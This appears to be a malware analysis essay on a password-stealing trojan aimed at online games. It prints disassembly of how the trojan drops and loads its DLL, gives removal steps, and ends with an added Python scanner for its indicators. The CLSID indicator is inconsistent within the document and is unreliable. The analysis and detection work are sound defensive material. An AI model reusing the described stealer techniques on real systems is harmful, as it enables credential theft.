Win32OnlineGames


    8/14/2019 Win32OnlineGames
    1/4

    .:: Trojan-PSW.Win32.OnLineGames.eos ::.

    Author: Giuseppe 'Evilcry' Bonfa'
    E-mail: evilcry {AT} gmail {DOT} com

    Website: http://evilcry.altervista.org
    Blog: http://evilcodecave.wordpress.com

    The Essay

    Win32.OnLineGames is a PSW Trojan, which works as a Password Stealer, specifically written to steal online gaming passwords.

    00401314 add eax, esi
    00401316 lea eax, ds:401442h
    0040131C jmp eax ; 00401442

    At the entry point, code flow jumps to 00401442

    00401442 push ebp
    00401443 mov ebp, esp
    00401445 sub esp, 52Ch
    0040144B call ds:GetCurrentThreadId
    00401451 push eax
    00401452 call ds:GetThreadDesktop
    00401458 test eax, eax
    0040145A jnz short loc_40145D
    0040145C int 3 ; Trap to Debugger
    0040145D push ebx
    0040145E push esi
    0040145F push edi
    00401460 mov edi, offset aCzxsderdaksiic ; "CZXSDERDAKSIICS_MX"
    00401465 xor esi, esi
    00401467 push edi ; String
    00401468 push esi ; NULL
    00401469 push EVENT_ALL_ACCESS
    0040146E call ds:OpenEventA

    Obtains the handle to the desktop associated with the executable itself and opens the handle of an existing event called CZXSDERDAKSIICS_MX; if the event exists, its handle is closed, else a new event (also called CZXSDERDAKSIICS_MX) is created with standard SecurityAttributes.

    00401486 mov [ebp-10h], eax
    00401489 mov edi, offset off_401154 ; Edi points to an array of strings, that are a list of executables
    0040148E mov ecx, [edi]
    00401490 call sub_401798 ; Check if the searched process is running
    00401495 cmp eax, esi
    00401497 jz short loc_4014B2 ; If no, go to the next process
    00401499 push eax
    0040149A push esi
    0040149B push 1F0FFFh
    004014A0 call ds:OpenProcess
    004014A6 cmp eax, esi
    004014A8 jz short loc_4014B2
    004014AA push esi
    004014AB push eax
    004014AC call ds:TerminateProcess
    004014B2 add edi, 4
    004014B5 cmp edi, offset dword_40115C ; Next process to search
    004014BB jl short loc_40148E


    004014BD call sub_40131E ;AdjustTokenPrivilege

    The searched executables are: Twister.exe and FilMsg.exe

    0040151B call ds:GetSystemDirectoryA
    00401521 mov edx, offset asc_401204 ; "\\"
    00401526 lea ecx, [ebp-11Ch] ; points to the System Directory
    0040152C call sub_40174A
    00401531 lea edx, [ebp-11Ch]
    00401537 lea ecx, [ebp-428h]
    0040153D call sub_40176F
    00401542 push esi
    00401543 call ds:GetModuleHandleA
    00401549 push offset aMndll ; "MNDLL"
    0040154E push 65h
    00401550 push eax
    00401551 mov [ebp+8], eax
    00401554 call ds:FindResourceA
    0040155A push eax ; 00402048
    0040155B mov [ebp-4], eax
    0040155E push dword ptr [ebp+8]
    00401561 call ds:SizeofResource
    00401567 push dword ptr [ebp-4]
    0040156A mov [ebp-18h], eax
    0040156D push dword ptr [ebp+8]
    00401570 call ds:LoadResource
    00401576 push eax ; 00402070
    00401577 call ds:LockResource
    0040157D cmp eax, esi
    0040157F mov [ebp-4], eax
    00401582 jnz short loc_40158E
    00401584 push dword ptr [ebp-10h]
    00401587 call edi ; CloseHandle
    00401589 jmp loc_4016C6

    The code here is clear: after establishing the System Directory, it searches for a resource of type "MNDLL" and then loads it. LoadResource gives us an interesting location, 00402070, which is an executable image; exploring this executable we can see some interesting strings: http://www.poptang.com/ekeyBind, ConfigAreaName, game.ini, SOFTWARE\Wizet\MapleStory

    004015A6 add esp, 0Ch
    004015A9 lea edx, [ebp-428h]
    004015AF lea ecx, [ebp-11Ch]
    004015B5 call ScansFor ; call sub_40176F (searches for csavpw0.dll)
    004015BA lea edx, [ebp-324h] ; SystemDirectory
    004015C0 lea ecx, [ebp-11Ch] ; csavpw0.dll
    004015C6 call sub_40174A
    004015CB lea eax, [ebp-11Ch]
    004015D1 push eax
    004015D2 call ds:DeleteFileA
    004015D8 push esi
    004015D9 push 80h
    004015DE push 2
    004015E0 push esi
    004015E1 push esi
    004015E2 lea eax, [ebp-11Ch]
    004015E8 push 40000000h
    004015ED push eax
    004015EE call ds:CreateFileA
    004015F4 cmp eax, 0FFFFFFFFh
    004015F7 mov [ebp-14h], eax
    004015FA jnz short loc_401605
    004015FC inc dword ptr [ebp+8]


    004015FF cmp dword ptr [ebp+8], 0Ah
    00401603 jb short loc_401591 ; Go to the next cycle

    If another csavpw0.dll already exists, it is first deleted and then recreated; if creation fails, the same routine is performed for csavpw1.dll, csavpw2.dll, and so on.

    In my case, csavpw2.dll exists.

    00401608 push esi
    00401609 push ecx
    0040160A push dword ptr [ebp-18h] ; Size: 4C00
    0040160D push dword ptr [ebp-4] ; Buffer: 00402070
    00401610 push eax
    00401611 call ds:WriteFile
    0040161A call CloseHandle
    0040161C push ebx
    0040161D call ds:Sleep
    00401623 lea ecx, [ebp-11Ch] ; C:\WINDOWS\system32\csavpw2.dll

    csavpw2.dll is filled with the data taken from the malware's resources.

    00401630 push ebx
    00401631 lea eax, [ebp-220h]
    00401637 push offset aCzxsderdaksi_0 ; "CZXSDERDAKSIICS_%d"
    0040163C push eax
    0040163D call ds:wsprintfA
    00401643 add esp, 0Ch
    00401646 lea eax, [ebp-220h]
    0040164C push eax ; CZXSDERDAKSIICS_0
    0040164D push esi
    0040164E push 1F0003h
    00401653 call ds:OpenEventA
    00401659 cmp eax, esi
    0040165B jz short loc_401666
    0040165D push eax
    0040165E call CloseHandle
    00401660 inc ebx
    00401661 cmp ebx, 0Ah
    00401664 jb short loc_401630

    As usual it searches for CZXSDERDAKSIICS_0, CZXSDERDAKSIICS_1, CZXSDERDAKSIICS_2, and so on; when the OpenEvent FAILS we have this:

    0040166C push 104h
    00401671 push eax
    00401672 push esi
    00401673 call ds:GetModuleFileNameA
    00401679 lea eax, [ebp-220h] ; CZXSDERDAKSIICS_2
    0040167F lea edx, [ebp-52Ch] ; Path of our virus executable
    00401685 push eax ; CZXSDERDAKSIICS_2
    00401686 lea eax, [ebp-11Ch]
    0040168C push eax ; C:\WINDOWS\system32\csavpw2.dll
    0040168D mov ecx, offset a8dfa290443ae89 ; "{8DFA2904-43AE-8929-9664-4347554D24B6}"
    00401692 call sub_40124E

    -> call sub_40124E creates a RegKey in HKEY_CLASSES_ROOT with SubKey CLSID\{8DFA2904-97C43AE-8929-9664-4347554D24B6} and sets some values such as "ExeModuleName", "DllModuleName", "SobjEventName"

    004016B5 push eax ; csavpw2.dll
    004016B6 call edi ; LoadLibraryA
    004016B8 push esi


    004016B9 call ds:ExitProcess
    004016BF push eax
    004016C0 call ds:CloseHandle

    .:: Trojan Removal ::.

    1) Delete the Trojan file: csavpw0/1/2/etc.dll

    2) Delete the following CLSID CLSID\{8DFA2904-97C43AE-8929-9664-4347554D24B6}
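    As an added example (not part of the essay, nor the author's code), a small Python triage routine that checks a host inventory against the indicators described above: the CZXSDERDAKSIICS_MX / CZXSDERDAKSIICS_%d event names, a csavpw<n>.dll in the system directory, and the CLSID key with its ExeModuleName / DllModuleName / SobjEventName values. The snapshot dictionary is constructed sample data; the assumed shape is what a host collector enumerating named events, files and registry keys would produce.

```python
import re

# Indicators taken from the analysis above. The CLSID is the one the essay's
# removal section names; the event and DLL names follow its observed patterns.
EVENT_RE = re.compile(r"^CZXSDERDAKSIICS_(MX|\d)$")
DLL_RE = re.compile(r"\\system32\\csavpw\d\.dll$", re.IGNORECASE)
CLSID_KEY = r"HKEY_CLASSES_ROOT\CLSID\{8DFA2904-97C43AE-8929-9664-4347554D24B6}"
CLSID_VALUES = {"ExeModuleName", "DllModuleName", "SobjEventName"}


def scan_snapshot(snapshot):
    """Return (indicator_type, evidence) tuples for every match in `snapshot`.

    `snapshot` is a dict shaped like the output of a host collector (assumed):
      "events":   iterable of named kernel event object names
      "files":    iterable of full file paths
      "registry": dict mapping key path -> set of value names under that key
    """
    findings = []
    for name in snapshot.get("events", ()):
        if EVENT_RE.match(name):
            findings.append(("event", name))
    for path in snapshot.get("files", ()):
        if DLL_RE.search(path):
            findings.append(("file", path))
    for key, values in snapshot.get("registry", {}).items():
        if key.lower() == CLSID_KEY.lower():
            # Report the key even if the expected values are missing: the key alone is the IoC.
            hits = sorted(CLSID_VALUES & set(values))
            findings.append(("registry", f"{key} values={hits}"))
    return findings


# Constructed sample snapshot (not real telemetry) mirroring the essay's observations,
# plus one benign entry per category to show that only the indicators are reported.
SAMPLE = {
    "events": ["CZXSDERDAKSIICS_MX", "CZXSDERDAKSIICS_2", "ExampleBenignEvent"],
    "files": [r"C:\WINDOWS\system32\csavpw2.dll", r"C:\WINDOWS\system32\kernel32.dll"],
    "registry": {
        CLSID_KEY: {"ExeModuleName", "DllModuleName", "SobjEventName"},
        r"HKEY_CLASSES_ROOT\CLSID\{00000000-0000-0000-0000-000000000000}": {"InprocServer32"},
    },
}

if __name__ == "__main__":
    for kind, evidence in scan_snapshot(SAMPLE):
        print(f"[{kind}] {evidence}")
```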

    Regards,
    Giuseppe 'Evilcry' Bonfa'